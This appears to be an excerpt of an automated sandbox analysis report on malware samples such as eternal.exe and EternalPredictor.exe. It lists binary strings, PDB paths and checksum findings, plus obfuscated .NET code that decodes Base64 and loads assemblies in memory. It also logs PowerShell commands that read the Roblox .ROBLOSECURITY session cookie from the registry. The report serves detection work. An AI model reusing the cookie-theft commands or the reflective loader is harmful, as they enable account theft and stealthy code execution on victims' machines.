!= 
NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                        Source: Binary string: .pdb/ source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: program.exe, 00000005.00000003.1516009158.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1955438323.00007FFBBB594000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: program.exe, 00000008.00000002.1950555246.00007FFBA6512000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: program.exe, 00000005.00000003.1516009158.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1955438323.00007FFBBB594000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb/? source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: program.exe, program.exe, 00000008.00000002.1950555246.00007FFBA65AA000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbl source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 0C:\Windows\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: program.exe, 00000008.00000002.1955863036.00007FFBBC341000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BE50000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: program.exe, 00000008.00000002.1954782727.00007FFBAB971000.00000040.00000001.01000000.0000000C.sdmp
                        Source: Binary string: mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp, eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: program.exe, program.exe, 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: program.exe
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: program.exe, 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdbN0uP source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: program.exe, 00000008.00000002.1955626688.00007FFBBC151000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: program.exe, 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: program.exe, 00000008.00000002.1955177805.00007FFBBAF31000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb63 source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.pdbhP source: powershell.exe, 00000033.00000002.1693664914.000001F880386000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: program.exe, program.exe, 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: program.exe, 00000008.00000002.1954529831.00007FFBAB941000.00000040.00000001.01000000.00000010.sdmp
                        Source: Binary string: indoC:\Windows\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: program.exe, 00000008.00000002.1953128317.00007FFBAA8E8000.00000040.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: program.exe, program.exe, 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: program.exe, program.exe, 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmp

                        Data Obfuscation

Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.U2xZS9Ii0bNLwN14STRo7hwBRPZhfM0aicc7EKEBlrFHxeDFy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.klGcTAcrhqPTSR6ORizJ2c7HcRMpsdc3i6nBTyBWta4vxEDVy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.e1a4iS5m2cwY7Wz4tf9JJh8YkbpTv1LUNuS5AGzigkLRqkULl,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.zddVe2zadHhHeDck7teLRxIVYabLIJuFmKSkvkzjoYfQwS95L,z7GL3GcSz0bU9xxBylPHvbaUX8.BvRcOGTXZLhNVW8VvUiYmleWf3IvqmgfkWjeLSwSzGNWB3uGR2J9VQkAvHh()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[2],z7GL3GcSz0bU9xxBylPHvbaUX8.aUh9qYlzTyllGrbrPVeJLz9A4o4sfJf9qsZ9CQe2zFJG296vAZakwP5nCJA(Convert.FromBase64String(LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.U2xZS9Ii0bNLwN14STRo7hwBRPZhfM0aicc7EKEBlrFHxeDFy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.klGcTAcrhqPTSR6ORizJ2c7HcRMpsdc3i6nBTyBWta4vxEDVy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.e1a4iS5m2cwY7Wz4tf9JJh8YkbpTv1LUNuS5AGzigkLRqkULl,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.zddVe2zadHhHeDck7teLRxIVYabLIJuFmKSkvkzjoYfQwS95L,z7GL3GcSz0bU9xxBylPHvbaUX8.BvRcOGTXZLhNVW8VvUiYmleWf3IvqmgfkWjeLSwSzGNWB3uGR2J9VQkAvHh()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[2],z7GL3GcSz0bU9xxBylPHvbaUX8.aUh9qYlzTyllGrbrPVeJLz9A4o4sfJf9qsZ9CQe2zFJG296vAZakwP5nCJA(Convert.FromBase64String(LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.U2xZS9Ii0bNLwN14STRo7hwBRPZhfM0aicc7EKEBlrFHxeDFy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.klGcTAcrhqPTSR6ORizJ2c7HcRMpsdc3i6nBTyBWta4vxEDVy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.e1a4iS5m2cwY7Wz4tf9JJh8YkbpTv1LUNuS5AGzigkLRqkULl,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.zddVe2zadHhHeDck7teLRxIVYabLIJuFmKSkvkzjoYfQwS95L,z7GL3GcSz0bU9xxBylPHvbaUX8.BvRcOGTXZLhNVW8VvUiYmleWf3IvqmgfkWjeLSwSzGNWB3uGR2J9VQkAvHh()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[2],z7GL3GcSz0bU9xxBylPHvbaUX8.aUh9qYlzTyllGrbrPVeJLz9A4o4sfJf9qsZ9CQe2zFJG296vAZakwP5nCJA(Convert.FromBase64String(LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: o4DruXGjL07o2HIFSRdU1PNswHXNNiP4YoTvKJjE1DPXeiunlYhlqIeliXadQH1QXJgcgn6jIzq13184TVW4yyI4fojGlGN86m3 System.AppDomain.Load(byte[])
Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp System.AppDomain.Load(byte[])
Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: o4DruXGjL07o2HIFSRdU1PNswHXNNiP4YoTvKJjE1DPXeiunlYhlqIeliXadQH1QXJgcgn6jIzq13184TVW4yyI4fojGlGN86m3 System.AppDomain.Load(byte[])
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp System.AppDomain.Load(byte[])
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: o4DruXGjL07o2HIFSRdU1PNswHXNNiP4YoTvKJjE1DPXeiunlYhlqIeliXadQH1QXJgcgn6jIzq13184TVW4yyI4fojGlGN86m3 System.AppDomain.Load(byte[])
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp System.AppDomain.Load(byte[])
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs .Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA4220350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 8_2_00007FFBA4220350
Source: program.exe.0.dr Static PE information: real checksum: 0x7a2451 should be: 0x7a28dd
Source: eternal.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x1db0f
Source: skuld.exe.0.dr Static PE information: section name: .xdata
Source: skuld.exe.0.dr Static PE information: section name: .symtab
Source: C:\Users\user\AppData\Roaming\eternal.exe Code function: 2_2_00007FFB4A1324AD push E95E523Bh; retf 2_2_00007FFB4A132589
Source: C:\Users\user\AppData\Roaming\eternal.exe Code function: 2_2_00007FFB4A132C0D push ecx; retf 2_2_00007FFB4A132C1C
Source: C:\Users\user\AppData\Roaming\eternal.exe Code function: 2_2_00007FFB4A13243D push E95E523Bh; retf 2_2_00007FFB4A132589
Source: C:\Users\user\AppData\Roaming\eternal.exe Code function: 2_2_00007FFB4A135E86 push cs; retf 2_2_00007FFB4A135E87
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA4176008 push rsi; retf 8_2_00007FFBA417600B
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA4176058 push rbp; retf 8_2_00007FFBA417605B
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA4176038 push rbp; retf 8_2_00007FFBA4176043
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA4176068 push rsp; retf 8_2_00007FFBA417606B
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA417AC25 push rcx; ret 8_2_00007FFBA417AC62
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA60B4331 push rcx; ret 8_2_00007FFBA60B4332
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE0B0 push rsi; retf 8_2_00007FFBA66AE0BB
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE018 push rsi; retf 8_2_00007FFBA66AE04B
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE010 push rsi; retf 8_2_00007FFBA66AE04B
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE070 push rbp; retf 8_2_00007FFBA66AE073
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE060 push rsp; retf 8_2_00007FFBA66AE063
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE050 push rbp; retf 8_2_00007FFBA66AE053
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE048 push rbp; retf 8_2_00007FFBA66AE053
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE038 push rsi; retf 8_2_00007FFBA66AE04B
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE030 push rsi; retf 8_2_00007FFBA66AE04B
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBA66AE028 push rsi; retf 8_2_00007FFBA66AE04B
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA4990A8 push rbp; retf 8_2_00007FFBAA4990C3
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA4990C0 push rbp; retf 8_2_00007FFBAA4990C3
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA499068 push rbp; retf 8_2_00007FFBAA499073
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA499038 push rbp; retf 8_2_00007FFBAA499053
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA499058 push rsi; retf 8_2_00007FFBAA499063
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA499050 push rbp; retf 8_2_00007FFBAA499053
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA499040 push rsp; retf 8_2_00007FFBAA499043
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA4C7010 push rsi; retf 8_2_00007FFBAA4C7013
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA4C7070 push rsp; retf 8_2_00007FFBAA4C7073
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA4C7060 push rbp; retf 8_2_00007FFBAA4C7063
Source: C:\Users\user\AppData\Roaming\program.exe Code function: 8_2_00007FFBAA4C7038 push rbp; retf 8_2_00007FFBAA4C7043
Source: eternal.exe.0.dr, PNTkHhRdRADo9Htu8dbFVLGTwqCu2qbzjYH5zYlur5KxgSz1jQZuw8evWYvsSGwZnSHAYTXqL6hUBfvaIp2CoAMx26V.cs High entropy of concatenated method names: '_0c5osAYdBH9XJ94w4zO6l972AlhrdGad0hqnAFgCFDwSXcziYUz2q1XXqL3Zde5p35YLYKckiT7zmCnBswlBhvyUlKO', 'zTL2B64wg2rWQWqASrnYspHnl0Z1Aumla4SUxs4D64pQI2WON1JnzP1oGkeyMwLMnb0f8QieLG4h', 'rkr0zO6T26LPtwV3U9c2u5xYBuctzMPqkJXb8TIBxlUKlPIg8rAaiHfjLP71Hzw255mMcNkH7LQq', 'Btv4maALwmARX', 'HJNgJkbLwyzIr', 'EHT5RPoBsAnvY', 'U5FhaAIW2Nj2K', '_7zTNkjNQ0QD3c', 'hQgK5oM9YmxrQ', 'LnSuQAe3DhXZ2'
Source: eternal.exe.0.dr, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Ea65l0P6VLiuAGdcSTuvjZVcwJgbGY1253l4vMwdSVADH492dX4PnHlSS35V2YM5c6dN3ZqKdkec', 'kOmiM1AbuLNjuLBf89wLzzjhN1Q3cqGGQEB6xJwPBYbBFOr4CSGH78YstQzx2itJcGbuOsGxLZKK', 'xGK7vCJFSYRW1gcvS6EUjMnJRR8OBcSkO5EdL9avx0j551WfeEgaTLxv1eSH4wQTZWjFIcRo4bUj', 'ERiYjJBn6pFxsGNYLGgy8QzMDp73EOBHgudvczYH3MSATieVEHc6hvYTbAy3glIC6sE2LzEEvOMf'
Source: eternal.exe.0.dr, ZTVYtJFrmsQJQ9ljOwNBcyaFo9DitMyOY4oipU4ny.cs High entropy of concatenated method names: 'NoCle4xZmufxswDeh5fhpTUgoSAb5eavmQrRgKskO', 'zZWCPg3bEKG534TZwNRhlqsIneV7P6FWDiwU', '_2yRRy4y5sBKarxi31GYBsSZgy2BbH10JSslb', 'f9J0BO2UoDn7uyJSkFmSMqD2U0CLAbQJIjKF', 'jF9RGodWK3s5qoVwiawclr9bGbBnIk6BZnQH'
Source: eternal.exe.0.dr, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.cs High entropy of concatenated method names: 'k06g0iCbZCrfysspSRMUJhlvYv79m1SSzswTsLBuX8Uz3rCOToqYxOxgf2zC01crRWspIvgXQ8oEiE7TM', '_7zpgzbS6PiDyDJENNtstPc6AcDWETdl9qa8VBBfjip0JV0wNKaiUYqCSDNhWBNrFA2q5hZsTYIrwXV9eo', 'efanD038HcFIAEn81JcePjTZcmuYEb18URcxTmSvOhAn2vjbQL2CvMLKx5U8ELzWTMGmNEUgxjPFbQEUH', 'S6TBniyDwO1QE4SgIJD32eq9ggNzFjSC7eVHzx0pqJHhS5zDr1NKfdFiZ950zBN5SCgKu9PCd5pNKgRd4', '_5NB66cSsdfZl1wYpuBTFxnfbtIFkKthngYBP7aJYPI8h0KaVs8ob5oRSiwXQ0WpBTp3oQYyd9hCBeebIi', '_8auKXwrMjrWK6GETcQFbdg3Vp79uUUIPDb9Sy4WFo66QIUaj0mFhsh0uP1EDWfjJPZhOohG04ClP6EwKU', 'eZLULBsWHjkkBfq6UUkYqvjdfep7gP0Jsax6nfq8yPBu0kvptOtgeoAB89ekjARl0orRbLzx8vIrJJNzz', 'Uqe2k6rcLSu5PX1j4tOqUiz3AsHedfpnumnQKYbU0ZFOajGepCrXgVlcsAJjGLiJ3YS24bwh0hfa1TXHx', 'fPrS3IoE8AU3qNIg9y0bwAv5b2OwoCgc90vr3Dv9sCQsynP59RPumSLyr7wt2Q86BBiUuUlWpbuS75vgr', '_1bidLvfGyo8kT6sraMlH8OWiBDlbh3JTvPbdsjQ5ks4b8uEikoXH93LqXuA3XXmZXSrsBs1I2EenFSSKB'
Source: eternal.exe.0.dr, 07Cdq7Slaf2T0jZczBuwyUXHac.cs High entropy of concatenated method names: 'aNTMw6Lu16q3XeWHR1sR3PMWSc', '_85n0wGBYXzEAGGt4l8PGE0RDXu', 'CTQ4WASzc8s72DCU4qjXS0CXRl', 'Pc3Yhm8jNS8GFjGCj9zEGX6vS0', '_4SJw3T4IWGV1RB84xPDOcTwCH0BWzCDx7Cv9O75zcJBpdLzVGT2sJz', 'V7c4x1ZactwY6IDS1gx8EozmV7NQKodI3NEVUIzH9cdwub65IquqG5', 'tSoF4ErRLVczkRNY4oAHQYpg18er1hxx2JuiJvKNPus0RjONzUM9Ty', 'cReP19Usgw2ijL8SFqsFgwdEKNtvIYJq2VudLBTLJe7lL7ul2XGIKU', 'KrU1gipWTZPHUOXxkvD6LuPOmDsvj4AojcsA06vZMleEQghmaWD9sW15aZKDoJY72JOLWqRzXCo68c64eXudEf', 'w2J7OZ6KgMoKAlYfNB0Zamm0AZZpzVfIOcLbbErEWdfgG9fasIJXDTSSjeekkiQQ54pP4m3ld4E0FbrPz2HFkh'
Source: eternal.exe.0.dr, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.cs High entropy of concatenated method names: 'eZmacRaUJwyo2V4YVB3fpVPcLirYMs9NgnkwDjFGp', 'd85CNq0UL5V9VHkpmg49vGPNv2eivxNFlfn6SA8Wa', 'aaPTnTrt8Ym4okXALJ8ARVYV41jgbEBIV1xhS5jpX', 'TipMraploFbtSJXkrL2wl7mQA2', '_8kYnfx2Lev1BuxUf3rf6rrRChf', 'YZm91ip80fd4eMng8qFrdBzNCg', 'IVWmqzIBjqA6oT2vjG5RkSmRor', 'Pr3QotefBmeLPnEJGZAv75JZ0Z', 'UxwYolw5crzg8rmsMOEamrwCXu', 'Sy558Qu3s6mdrFllG7ujEwVbsF'
